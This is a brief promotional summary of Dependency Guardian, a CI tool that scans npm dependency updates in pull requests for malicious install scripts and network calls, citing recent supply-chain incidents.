A developer has created Dependency Guardian, a tool designed to catch malicious npm packages that steal passwords during installation. The need for such a tool became urgent following high-profile incidents like the 2.6B weekly downloads compromised in the Chalk/Debug hijack and the 500+ infected packages from the Shai-Hulud worm. These breaches exposed 23K repositories, including the Coinbase incident, highlighting critical gaps in current dependency security practices.

Traditional CI pipelines allow unreviewed package updates to reach production, often without CVE detection. Dependency Guardian introduces a four-step intake process: pull request scanning, behavioral analysis via 26 detectors, risk scoring, and automated verdicts (pass/warn/block). This system prevents malicious code from merging by analyzing install scripts and network calls, catching zero-day attacks that CVE tools miss. The solution integrates with GitHub Actions, GitLab CI, and other CI systems, scanning only npm packages while keeping application code private.

The tool provides compliance-ready audit trails and configurable policy enforcement, allowing teams to set thresholds and allowlists per repository. Every dependency change gets a verdict posted directly in the PR, ensuring governance before merge. This approach transforms dependency updates from a blind process into a controlled security measure, offering teams confidence in their supply chain integrity.